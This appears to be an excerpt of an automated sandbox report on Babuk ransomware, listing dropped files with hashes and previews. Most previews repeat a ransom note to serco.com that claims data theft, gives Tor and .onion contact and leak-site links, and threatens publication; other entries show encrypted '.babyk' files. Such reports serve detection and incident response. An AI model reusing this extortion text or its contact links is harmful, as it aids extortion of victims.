                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.479567012504289
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlVhHi024uVNQALUzXEh1wv2iKJPKFyX3bpvT+rDbM51zovuaLcpnpll+UxNvEEn:vCPtvg7EjwvsD31vTwDu9ovlLcl80vtn
                                                                            MD5:A6EE9E6F77ED99A414C9AFA5B8568707
                                                                            SHA1:61BFEAAA6502E6C5E1DA25643535DC9B33540508
                                                                            SHA-256:FE5F5D68EEF184F1A85EE04241382B3E1154ECD875A896A615A5E4807ECD9F33
                                                                            SHA-512:B2D92FA9A73D35EA82857E32F655F2D309407A5C2D9B0E839C19E20A206DCC73F3C25B397BBF324CCCD73804FB431D9B511C344A8D117BE7B8FC8037A3B50D23
                                                                            Malicious:false
                                                                            Preview: ....i./_b..S]c..... ....$R..2......vi...}...h..X.l`L'..P/...aw`G...!....S#...M..xoVHM.L.Q.)....A!y..9..y.S.i.... .CoW.=.....L.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980166865846239
                                                                            Encrypted:false
                                                                            SSDEEP:192:ORc/X255MBvo+ENZ+YEfT6no6AN4A+ReFwuRctAoh86I:ORQXWyvo+EThfo6A14eLsbrI
                                                                            MD5:1D11B20E4519021F1694F9398631DA43
                                                                            SHA1:2A442E8CDD9A64F3601116E9BDB42E248FD4F09A
                                                                            SHA-256:11639CB1F285A7AF63E25D831EE576D264FAB408013E549CF94B1171E6156000
                                                                            SHA-512:F290802C9A4522C6B138DA4E5CC3E10C67474BF3B86CE6E292EB9A4ED4CA39C6D900FCD04023BC7337FFE0272D15906D87CEA5C23BA2E7B499291808EED21F66
                                                                            Malicious:false
                                                                            Preview: f....E.........413.qI...J.~......D.>.B..R.d...B......,.J.:..;`....k.....o...{.q...mR......S...c:,>n:....O.jk.S....<.7Is.oG..K...F....H.S=,+.|......2...4@.+E.?..X...;.I..P.4Z.;.M'RX.=n\..n&k.g...R.8..e.4.(.f...o......*h.(....k.P._..2:...6.Y..P<.~g.a.o..w.=P..!..1..}O..."KK..cM.}.4....=..b..M.......o.>...........w.vH.]..#-.^2Q...T.f..Vu....f.K.G......B..y........T.^#.x..e.1........lY....-v..T.F.....F..P.........u..d.......{G.,u |<uo.g./.v..8T,.S..>7...X..J..t..Q.?.4.WWI.47...JE.............#..R<xm.1...7.&+..B.7..................c..... ...m..N\c..5...W>..._............;.:..m....K..N..cO....W...H..(!!.l.....]d.9q.'.)....A..-0Z..2jIz..Tc.." .?6.U...//-......h.......r..+9^.....[UU=.....|w........,A../.[*..SM...hw.-`.R.G..w.......D$.M...}..(.D%*..n.e|7O.....%8.:O..[*...\9u.E.....?8.h..\.w.8...A....^..<.Jl.>.D.%r.~7*2..,.`.p...#.He9.N.....X.(~.{...D...._qa6qK.FlR!t...,B^n...u.....1.k..,%._g.P3...=.*.4..H.tD0.L....l`....D.c~.?."]l..q......^......^
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
